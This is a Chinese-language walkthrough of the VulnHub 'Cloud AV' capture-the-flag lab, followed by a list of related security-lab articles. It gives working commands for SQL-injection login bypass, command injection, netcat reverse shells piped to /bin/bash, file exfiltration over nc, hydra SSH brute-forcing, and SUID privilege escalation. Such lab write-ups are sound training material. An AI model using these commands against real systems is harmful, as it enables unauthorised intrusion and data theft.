靶场练习2:cloudantvirus
靶场链接
https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
信息收集
练习1用了arp-scan
,这种工具有可能会被防火墙流量监测到,所以可以使用arping
, 这种工具基本Linux
发行版都会自带。
for i in $(seq 1 255);do sudo arping -c 2 192.168.31.$i;done
根据回包来判断靶机地址。
下一步,扫描端口和服务。
sudo nmap -p- 192.168.31.197
sudo nmap -p22.8080 192.168.31.197
扫描到有ssh
和http
服务, web
服务使用Python
写的框架。
漏洞利用
访问Web服务,出现搜索框要求输入邀请码,有两种思路,暴破和注入。
注入的小技巧:先对所有键盘输入的特殊字符进行暴破,若存在状态码和回包长度不一致的,很有可能可以用于构造闭合语句。
回包显示网页使用了Flask
框架,且明确显示了数据库查询语句。
尝试使用万能密码
" or 1=1--+
顺利登录,返回一个病毒扫描页面。文本框要求输入一个文件名称,逻辑一般是文件名拼接扫描命令,可以尝试命令执行。
hello | ls
网页顺利回显了文件列表,证明了命令执行的存在。此时可以尝试写入反弹shell,因为框架使用Python
写的,可以使用Python
的反弹shell。 如果靶机环境存在 netcat
, 也可以利用 nc
构建反弹shell。
# kali
nc -nvlp 4444
# 文本框
nc 192.168.31.157 4444 -e /bin/bash
监听端口后无回显,可能是因为靶机环境的 netcat
版本过低,并不支持 -e
参数。
将之删掉后,显示连接已建立。
此时要用到的小技巧叫 nc
串联:靶机反向连接 kali
, 通过管道符将输入的命令传入 /bin/bash
,然后再通过管道符将结果反向输出到 kali
的另一个端口上。
hello | nc 192.168.31.157 3333 | /bin/bash | nc 192.168.31.157 4444
此时kali
终端中左侧输入的命令,执行后结果在右侧可显示输出。
提权
查看一下文件权限和文件列表,除了数据库文件外,其他文件对提权并没有作用。使用file database.sql
得到数据库是 sqlites
,该数据库是本地数据库,然而靶机环境中并没有读取数据库的工具,所以要把它传输到kali
中读取。
# kali
nc -nvlp 5555 > db.sql
# 靶机
nc 192.168.31.157 5555 < database.sql
传输完成后使用kali
的 sqlite3
工具进行数据库文件的读取。
发现数据库中都是密码字段,同时在靶机上cat /etc/passwd
可以获取用户字段,我们可以用这些信息各自构造一个字段来对靶机的ssh
服务进行暴破。
hydra -L usr.txt -P pass.txt ssh://192.168.31.197
暴破并不成功,寻找另外一种思路。使用pwd
看看当前目录,本目录下没有其他线索可用了,退到上一级目录看看。
通过文件列表,可以看到有一个可执行文件具有suid
权限,且据推测应该由该目录下一个.c
文件编译而来。
通过查看.c
文件可以看到,该文件的功能是对cloudav
进行升级,且命令后带一个参数,可以利用suid
尝试在参数上构造管道拼接提权。
./update_cloudav "a|nc 192.168.31.57 5555| /bin/bash | nc 192.168.31.157 6666
同时在kali
上监听这两个端口,可以发现提权成功。
靶场练习2:cloudantvirus的更多相关文章
- CTF丨从零开始搭建WEB Docker靶场
第十二届全国大学生信息安全竞赛即将开始,小伙伴们有报名参加的吗?大家在比赛前是否开始进行模拟演练了?今天,i春秋将与大家分享靶场搭建的相关内容,帮助大家更好的进行实操演练. 学习搭建Docker靶场之 ...
- 第二次靶场练习:cookie注入
cookie注入 本文章目的是对相关的黑客内容进一步了解,如有人违反相关的法律法规,本人概不负责 一.学习目的: 利用手工注入网站 利用sqlmab注入 二.附件说明 靶场网址:http://120. ...
- 第一次靶场练习:SQL注入(1)
SQL注入1 本文章目的是对相关的黑客内容进一步了解,如有人违反相关的法律法规,本人概不负责 一.学习目的: 利用手工注入网站 利用sqlmab注入 二.附件说明 靶场网址:http://117.41 ...
- 文件上传漏洞靶场:upload-labs安装及第一关教程
注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!!! 一.简介 upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场.旨在帮助大家对上传漏洞有一个全 ...
- Jenkins高危代码执行漏洞检测/开源漏洞靶场
漏洞细节可以参看安全客的文章:https://bbs.ichunqiu.com/thread-22507-1-1.html Jenkins-CLI 反序列化代码执行(CVE-2017-1000353) ...
- ethernaut 以太坊靶场学习 (1-12)
前言 这个靶场搜集了许多不同的 solidity 开发的问题,通过这个可以入门 区块链安全 Fallback 给出了源码 pragma solidity ^0.4.18; import 'zeppel ...
- 墨者学院靶场之PHP代码分析溯源(第1题)
申请靶场环境后 点开题目 一段奇怪的PHP代码 因为我自己电脑重装了win10系统,php+apache+mysql的环境本地主机觉得没必要弄了,于是我们用在线的PHP编码(百度一下到处都是) 复制进 ...
- SQLInjection 靶场配置
对于渗透,太小型的网站没有太大价值,而大型网站(比如各种电商平台)对于代码审计往往非常严格,新手基本找不到漏洞,而一些比较容易搞掉的站点(政府.gov.各种教育网站.edu或者很多商业中型站点)渗透又 ...
- 推荐开源靶场Vulhub
转:https://github.com/phith0n/vulhub Vulhub - Some Docker-Compose files for vulnerabilities environme ...
- billu_b0x靶场刷题
https://www.vulnhub.com/ 里面有很多安全环境,只要下载相关镜像,在虚拟机上面搭建运行就可以练习对应靶场了. 第一步.信息收集 nmap扫描内网开放80端口的存活主机 nmap ...
随机推荐
- UEditor采坑指南
1.版本选择 GitHub上的最新版(1.5)没有提供后端代码.想要后端代码可以下载历史版本(1.4.3.3). 1.5版本:https://github.com/fex-team/ueditor 1 ...
- immutable.js 学习笔记(三)----- Map
一.Map Map在原生的js中对应的是Object这样的结构,它都是key-value的键值对,并且它是无序的 二. API (一) set:设定值 (二)delete:删除值 每做一次增删改查都会 ...
- 进阶技术:Linux Arm32是如何调用C Main的
前言: Linux x64通过qemu的rdinit方式调用的C Main,实际上是通过load_elf_binary(加载和解析elf)和start_thread(设置Ip和sp),用缺页异常来调用 ...
- 亲测有效 Hyper V3.4.0 终端美化工具 支持win/mac
亲测有效 Hyper V3.4.0 终端美化工具 支持win/mac Hyper 是一款终端美化工具 基于Web技术,JS/HTML/CSS ,支持扩展增强,很不错! 且支持win,mac 下载地址 ...
- 自抗扰(ADRC)控制原理及控制器设计
https://blog.csdn.net/weixin_43487974/article/details/127163824?spm=1001.2101.3001.6650.2&utm_me ...
- 题解 [SCOI2008] 奖励关
为了这道题我学了期望 dp(? 为什么会有人期望 dp 入门是这道题啊歪(#`O′) wtx 一眼秒杀了这题,我们一起来膜拜他! 其实这题很水但是我之前没学过期望 dp 我是什么 nt. 显然我们以每 ...
- GetShell 之:利用 SQLServer GetShell
GetShell 之:利用 SQLServer GetShell 目录 GetShell 之:利用 SQLServer GetShell 1 SQLServer 基础操作 2 SQLServer 利用 ...
- vue-fullpage全屏插件使用
直入主题:vue项目中想做一个全屏翻滚的效果,vue-fullpage 就很不错 下面介绍vue-fullpage 的使用方法,这里封装成了vue的一个指令的形式来进行使用 1.安装vue-fullp ...
- CSS3 滑过加过渡效果
.vogueHover { width: 100%;height: 100%; position: absolute; left: 0; top: 0; background: #001e50; z- ...
- 地理探测器简介(R语言)
地理探测器 1. 地理探测器原理 空间分异性是地理现象的基本特点之一.地理探测器是探测和利用空间分异性的工具.地理探测器包括4个探测器. 分异及因子探测:探测Y的空间分异性:以及探测某因子X多大程度上 ...